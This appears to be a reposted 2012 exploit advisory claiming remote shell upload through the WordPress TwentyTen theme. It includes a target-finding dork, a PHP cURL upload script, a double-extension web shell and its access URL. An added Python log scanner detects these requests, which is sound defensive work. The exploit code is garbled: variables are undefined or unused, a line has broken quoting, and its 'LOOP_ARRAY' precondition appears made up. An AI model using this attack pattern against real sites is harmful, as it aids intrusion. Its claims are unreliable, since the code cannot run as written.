WordPress TwentyTen Shell Upload | BOT24


##################################################
# Description : WordPress Themes - TwentyTen Remote File Upload
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 1.5.x/1.4.x/1.3.x/1.2.x/1.1.x
# Link : http://wordpress.org/extend/themes/twentyten
# Date : Friday, December 28, 2012
# Dork : inurl:/wp-content/themes/twentyten
##################################################

Fact :
This exploit only works if the LOOP_ARRAY functions are enabled on the server. They are disabled by default, although if the administrator has ever configured the website, the array functions might have been enabled. cURL must be enabled too.


Exploit :

<?php

$uploadfile="scorp.php.gif";

$ch =
curl_init("http://www.site.com/wordpress/wp-content/themes/twentyten/loop.php");

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file[]'=>"@$attachfile"));
curl_setopt($ch, CURLOPT_POSTFIELDS, array('opt[]'=>"@$connector?rate=50&get_file=0?upload="@$attachfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.site.com/wordpress/wp-content/themes/twentyten/scorp.php.gif
Filename : $postResult output

scorp.php.gif
<?php
phpinfo();
?>
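
Detection note (an added example, not part of the original advisory or the author's code): the Python sketch below scans web server access logs for the two request shapes this advisory describes, a POST sent directly to a theme's .php template and a request for a file under wp-content whose name carries a PHP extension before its final one (as in scorp.php.gif). The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re

# Combined Log Format prefix: host ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# Direct POST to a .php file inside a theme directory (templates are normally
# included by WordPress itself, not requested by clients).
THEME_PHP_RE = re.compile(
    r"^/(?:[^/]+/)*wp-content/themes/[^/]+/(?:[^/]+/)*[^/]+\.php$", re.I)
# File under wp-content with a PHP-style extension hidden before the last one.
DOUBLE_EXT_RE = re.compile(
    r"/wp-content/(?:[^/]+/)*[^/]+\.(?:php\d?|phtml|phar)\.[a-z0-9]+$", re.I)

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Dec/2012:10:00:01 +0000] "POST /wordpress/wp-content/themes/twentyten/loop.php HTTP/1.1" 200 512 "-" "curl/7.28.0"',
    '203.0.113.7 - - [28/Dec/2012:10:00:05 +0000] "GET /wordpress/wp-content/themes/twentyten/scorp.php.gif HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [28/Dec/2012:10:01:00 +0000] "GET /wordpress/wp-content/themes/twentyten/style.css HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [28/Dec/2012:10:01:30 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [28/Dec/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/2012/12/photo.gif?v=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client, rule, path, status) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # not a parseable access-log line
    client, method, target, status = m.groups()
    path = target.split("?", 1)[0]  # match on the path, ignore the query string
    if method == "POST" and THEME_PHP_RE.match(path):
        return (client, "post-to-theme-template", path, int(status))
    if DOUBLE_EXT_RE.search(path):
        return (client, "double-extension-request", path, int(status))
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [f for f in map(classify, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit from either rule is a lead to triage, not proof of compromise: check whether the named file exists on disk and whether the server is configured to hand files with such names to the PHP interpreter.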
 
   
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.
      